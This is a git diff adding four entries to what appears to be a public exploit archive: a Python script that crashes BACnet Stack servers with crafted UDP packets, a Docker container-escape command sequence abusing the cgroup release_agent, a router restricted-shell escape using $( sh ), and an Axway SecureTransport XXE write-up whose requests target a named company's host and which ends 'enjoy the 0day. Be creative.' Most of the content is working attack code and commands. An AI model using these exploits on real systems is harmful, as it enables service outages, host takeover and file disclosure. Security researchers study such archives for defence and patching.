diff --git a/exploits/linux/dos/47148.py b/exploits/linux/dos/47148.py
new file mode 100755
index 000000000..ee9a7b327
--- /dev/null
+++ b/exploits/linux/dos/47148.py
@@ -0,0 +1,131 @@
+# Exploit Title: BACnet Stack 0.8.6 - Denial of Service
+# Google Dork: [if applicable]
+# Date: 2019-07-19
+# Exploit Author: mmorillo
+# Vendor Homepage: https://sourceforge.net/p/bacnet/
+# Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/
+# Version: bacnet-stack-0.8.6
+# Tested on: Linux
+# CVE: CVE-2019-12480
+
+#!/usr/bin/env python
+#
+# After reported the bug to the vendor, sharing details
+# about the vulnerability, as well as proof-of-concept code (exploit code to
+# test), has been release a fix for 0.8.7 release of
+# BACnet Protocol Stack https://sourceforge.net/p/bacnet/
+
+import socket
+import struct
+import argparse
+import os
+import sys
+from termcolor import colored
+
+#------------------------------------------------------------------------------
+# Command line parser using argparse
+#------------------------------------------------------------------------------
+
+def cmdline_parser():
+ parser = argparse.ArgumentParser(conflict_handler='resolve', add_help=True,
+ description='BACnet Protocol Stack Segmentation fault leading to denial of service', version='0.1',
+ usage="python %(prog)s")
+
+ # Mandatory
+ parser.add_argument('Server', type=str, help='BACnet server IP')
+ parser.add_argument('Port', type=str, help='BACnet port')
+
+ return parser
+
+
+def get_Host_name_IP():
+ try:
+ host_name = socket.gethostname()
+ host_ip = socket.gethostbyname(host_name)
+ return host_ip
+ except:
+ print("Unable to get Hostname and IP")
+
+
+def target_alive(BACnetServer, BACnetPort):
+ response = os.system("nc -u -z -w 1 " + BACnetServer + " " + str(BACnetPort))
+
+ if response == 0:
+ return True
+ else:
+ return False
+
+#------------------------------------------------------------------------------
+# Main of program
+#------------------------------------------------------------------------------
+
+def main():
+
+ # Get the command line parser.
+ parser = cmdline_parser()
+
+ # Show help if no args
+ if len(sys.argv) == 1:
+ parser.print_help()
+ sys.exit(1)
+
+ # Get results line parser.
+ results = parser.parse_args()
+
+ BACnetServer = results.Server
+ BACnetPort = int(results.Port)
+ SRC_IP = get_Host_name_IP()
+
+ if not target_alive(BACnetServer, BACnetPort):
+ print((colored("[+] BACnet server down", "yellow")))
+
+ else:
+ if target_alive(BACnetServer, BACnetPort):
+
+ payload_DeviceCommunicationControl = "\x81\x0a\x00\x16\x01\x04\x00\x05\x01\x11\x0d\xff\x80\x00\x03\x1a\x0a\x19\x00\x2a\x00\x41"
+
+ print((colored("[+] Sending BACnet DeviceCommunicationControl payload from " + SRC_IP, "green")))
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
+ s.connect((BACnetServer, BACnetPort))
+ s.send(struct.pack('>I',len(payload_DeviceCommunicationControl)))
+ s.send(payload_DeviceCommunicationControl)
+
+ print((colored("[+] Sent Payload: " + payload_DeviceCommunicationControl.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
+
+ if target_alive(BACnetServer, BACnetPort):
+
+ payload_AtomicReadFile = "\x81\x0a\x00\x1b\x01\x14\x00\x05\x01\x06\xc4\x02\x80\x00\x00\x0e\x35\xff\xdf\x62\xee\x00\x00\x22\x05\x84\x0f"
+
+ print((colored("[+] Sending BACnet AtomicReadFile payload from " + SRC_IP, "green")))
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
+ s.connect((BACnetServer, BACnetPort))
+ s.send(struct.pack('>I',len(payload_AtomicReadFile)))
+ s.send(payload_AtomicReadFile)
+
+ print((colored("[+] Sent Payload: " + payload_AtomicReadFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
+
+ if target_alive(BACnetServer, BACnetPort):
+
+ payload_AtomicWriteFile = "\x81\x0a\x00\x1b\x01\x04\x00\x05\x02\x07\xc4\x02\x80\x00\x00\x0e\x35\xff\x5e\xd5\xc0\x85\x0a\x62\x64\x0a\x0f"
+
+ print((colored("[+] Sending BACnet AtomicWriteFile payload from " + SRC_IP, "green")))
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
+ s.connect((BACnetServer, BACnetPort))
+ s.send(struct.pack('>I',len(payload_AtomicWriteFile)))
+ s.send(payload_AtomicWriteFile)
+
+ print((colored("[+] Sent Payload: " + payload_AtomicWriteFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
+
+ if not target_alive(BACnetServer, BACnetPort):
+ print((colored("[+] DoS completed", "red")))
+
+
+#------------------------------------------------------------------------------
+# Main
+#------------------------------------------------------------------------------
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/linux/local/47147.txt b/exploits/linux/local/47147.txt
new file mode 100644
index 000000000..431708fab
--- /dev/null
+++ b/exploits/linux/local/47147.txt
@@ -0,0 +1,15 @@
+# On the host
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
+
+# In the container
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
\ No newline at end of file
diff --git a/exploits/linux/local/47149.txt b/exploits/linux/local/47149.txt
new file mode 100644
index 000000000..55b4e6888
--- /dev/null
+++ b/exploits/linux/local/47149.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape
+# Date: 2019-07-20
+# Exploit Author: AMRI Amine
+# Vendor Homepage: https://www.comtrend.com/
+# Version: GE31-412SSG-C01_R10.A2pG039u.d24k
+# Tested on: Linux (busybox)
+
+TL;DR: A local user can bypass the restricted shell using the command substitution operator $( commmand )
+
+Comtrend AR 5310 routers have a restricted shell, the list of command a user can execute is
+
+[ ? help logout exit quit reboot ads lxdslctl xtm loglevel logdest virtualserver ddns dumpcfg dumpmdm meminfo psp dumpsysinfo dnsproxy syslog ifconfig ping sntp sysinfo tftp wlan wlctl vlanctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route nslookup traceroute save uptime exitOnIdle wan build version serialnumber modelname acccntr upnp urlfilter timeres tr69cfg logouttime ipneigh dhcp6sinfo nat mcpctl ]
+
+Usual terminal constructs like:
+
+ the command separator ";"
+ the control operator "&" (run in forground)
+ the redirection operator (pipe) "|"
+ the command substitution operator "`"
+
+are all filtered as shown here :
+
+ > ;
+Warning: operator ; is not supported!
+telnetd:error:476.449:processInput:490:unrecognized command
+ > |
+Warning: operator | is not supported!
+telnetd:error:484.871:processInput:490:unrecognized command
+ > &
+Warning: operator & is not supported!
+telnetd:error:487.421:processInput:490:unrecognized command
+ > `
+Warning: operator ` is not supported!
+telnetd:error:495.334:processInput:490:unrecognized command
+
+Still the $ operator is not filtered:
+
+ > $
+telnetd:error:497.862:processInput:490:unrecognized command $
+
+Here i came to the conclusion that invoking a command with $( subcommand ) as argument would give an obvious shell
+
+> ping $( sh )
+exec >&2
+ps x | grep telnet
+18333 root 4164 S telnetd -m 0
+18334 root 4168 S telnetd -m 0
+
+EOF
\ No newline at end of file
diff --git a/exploits/linux/webapps/47150.txt b/exploits/linux/webapps/47150.txt
new file mode 100644
index 000000000..ecc1a3919
--- /dev/null
+++ b/exploits/linux/webapps/47150.txt
@@ -0,0 +1,208 @@
+# Title: Axway SecureTransport 5 - Unauthenticated XML Injection
+# Google Dork: intitle:"Axway SecureTransport" "Login"
+# Date: 2019-07-20
+# Author: Dominik Penner / zer0pwn of Underdog Security
+# Vendor Homepage: https://www.axway.com/en
+# Software Link: https://docs.axway.com/bundle/SecureTransport_54_AdministratorGuide_allOS_en_HTML5/page/Content/AdministratorsGuide/overview/overview.htm
+# Version: 5.x
+# CVE: N/A
+ _ _
+ _______ _ __ ___ | | ___ | |
+ |_ / _ \ '__/ _ \ | |/ _ \| |
+ / / __/ | | (_) || | (_) | |
+ /___\___|_| \___(_)_|\___/|_|
+ https://zero.lol
+ zero days 4 days
+
+
+ ATTENTION:
+
+ this is a friendly neighborhood zeroday drop
+
+
+
+
+"Axway SecureTransport is a multi-protocol MFT gateway for securing, managing, and tracking file flows among people and applications inside your enterprise, and beyond your firewall to your user communities, the cloud and mobile devices. It is designed to handle everything — from high-volume automated high speed secure file transfers between systems, sites, lines of business and external partners, to user-driven communications and mobile, folder- and portal-based file sharing."
+
+Who uses this software?
+
+Well, to name a few... (just use the dork dude)
+- Government of California
+- Biometrics.mil
+- Fleetcor
+- Costco
+- Boeing
+- IRS
+
+
+Description:
+Axway SecureTransport versions 5.3 through 5.0 (and potentially others) are vulnerable to an unauthenticated blind XML injection (& XXE) vulnerability in the resetPassword functionality via the REST API. If executed properly, this vulnerablity can lead to local file disclosure, DOS or URI invocation attacks (e.g SSRF->RCE). It's worth noting that in version 5.4 the v1 API was deprecated... but not removed entirely. Meaning that you can still trigger this vulnerability on updated installations if they have the v1.0, v1.1, v1.2 or v1.3 in the /api/ directory.
+
+
+Reproduction:
+
+1. Breaking the parser.
+
+ HTTP Request:
+ ```
+ POST /api/v1.0/myself/resetPassword HTTP/1.1
+ Host: securefile.costco.com
+ Content-Type: application/xml
+ Referer: localhost
+
+
+ ```
+
+ HTTP Response:
+ ```
+ {
+ "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]"
+ }
+ ```
+
+
+2. Verifying the vulnerability.
+
+ HTTP Request:
+ ```
+ POST /api/v1.0/myself/resetPassword HTTP/1.1
+ Host: securefile.costco.com
+ Content-Type: application/xml
+ Referer: localhost
+
+
+
+ ]>
+ &thisactuallyexists;&thisdoesnt;
+ ```
+
+ HTTP Response:
+ ```
+ {
+ "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 48; The entity "thisdoesnt" was referenced, but not declared.]"
+ }
+ ```
+
+ As you can see, the parser recognizes that "thisactuallyexists" was in fact declared. In the same error, we see that "thisdoesn't" was referenced, but not declared. This demonstrates that we can declare arbitrary entities.
+
+ https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#detect-the-vulnerability
+
+
+3. External Entity Injection (XXE) (hardened)
+
+ NOTE: Because the server doesn't reflect the input anywhere, our only option is error-based XXE or out-of-band XXE. However, upon initial discovery, it appears as though most Axway SecureTransport installations have some type of firewall blocking all outgoing requests. This makes exploiting traditional XXE difficult. Judging by this, my only ideas on exploitation would be via blind SSRF or by repurposing an existing DTD on the filesystem to trigger an error with the file contents/result of our payload. However because I don't have a license, I can't effectively audit this software from a whitebox perspective, which makes mapping out internal attack surface difficult. The underlying vulnerability remains... but with restrictions.
+
+ HTTP Request:
+ ```
+ POST /api/v1.0/myself/resetPassword HTTP/1.1
+ Host: securefile.costco.com
+ Content-Type: application/xml
+ Referer: localhost
+
+
+
+ ]>
+ &ssrf;
+ ```
+
+ HTTP Response:
+ ```
+ (empty)
+ ```
+
+ Local DTD repurposing example request:
+ ```
+ POST /api/v1.0/myself/resetPassword HTTP/1.1
+ Host: securefile.costco.com
+ Content-Type: application/xml
+ Referer: localhost
+
+
+
+
+
+
+ ">
+ %eval;
+ %error;
+
+
+ %local_dtd;
+ ]>
+
+
+ ```
+
+
+4. More vulnerability-indicating errors:
+
+ HTTP Request:
+ ```
+ POST /api/v1.0/myself/resetPassword HTTP/1.1
+ Host: securefile.costco.com
+ Content-Type: application/xml
+ Referer: localhost
+
+
+
+ ]>
+ &ssrf;
+ ```
+
+ HTTP Response:
+ ```
+ {
+ "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 22; The system identifier must begin with either a single or double quote character.]"
+ }
+ ```
+
+5. The original request
+
+ HTTP Request:
+ ```
+ POST /api/v1.0/myself/resetPassword HTTP/1.1
+ Host: securefile.costco.com
+ Content-Type: application/xml
+ Referer: localhost
+
+ email@email.com
+ ```
+
+ HTTP Response:
+ ```
+ (empty)
+ ```
+
+
+Conclusion:
+
+If a determined attacker were to get to know the Axway SecureTransport software, the chances of successfully chaining this bug are high. DTD repurposing is a relatively new technique, however in the near future we will be seeing a lot more of this attack vector due to XML parser restrictions/firewalled networks. I didn't feel comfortable doing further testing as I don't have a license, meaning I'm limited to testing against live targets. So for now, enjoy the 0day. Be creative.
+
+
+Remediation:
+
+In order to avoid this vulnerability, it's suggested to disable both doctype declaration and external general entities. You can find more information on that here: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java
+
+
+Notes:
+
+- Referer must be set.
+- Content type must be xml.
+- Successful request returns a HTTP/1.1 204 No Content
+- Any type of invalid XML throws an SAXParser exception.
+- If external entities were disabled... we should also recieve an exception.
+- Same with doctype declaration.
+- API endpoints can vary from /api/v1.0, /api/v1.1, /api/v1.2, /api/v1.3, /api/v1.4
+
+
+References:
+
+https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
+https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
+https://gist.github.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2
+https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
+https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 19425eec4..e8ae2a17f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6511,6 +6511,7 @@ id,file,description,date,author,type,platform,port
47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
+47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10565,6 +10566,7 @@ id,file,description,date,author,type,platform,port
46877,exploits/solaris/local/46877.c,"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation",2019-05-20,"Marco Ivaldi",local,solaris,
46878,exploits/solaris/local/46878.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2019-05-20,"Marco Ivaldi",local,solaris,
46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris,
+47147,exploits/linux/local/47147.txt,"Docker - Container Escape",2019-07-19,dominikczarnotatob,local,linux,
46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,
46917,exploits/windows/local/46917.txt,"Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
46912,exploits/windows/local/46912.txt,"Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation",2019-05-23,"Google Security Research",local,windows,
@@ -10600,6 +10602,7 @@ id,file,description,date,author,type,platform,port
47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux,
47134,exploits/windows/local/47134.rb,"Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)",2019-07-17,Metasploit,local,windows,
47135,exploits/windows/local/47135.txt,"Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation",2019-07-18,"Google Security Research",local,windows,
+47149,exploits/linux/local/47149.txt,"Comtrend-AR-5310 - Restricted Shell Escape",2019-07-22,"AMRI Amine",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41524,3 +41527,4 @@ id,file,description,date,author,type,platform,port
47144,exploits/linux/webapps/47144.txt,"Web Ofisi Rent a Car 3 - 'klima' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,
+47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,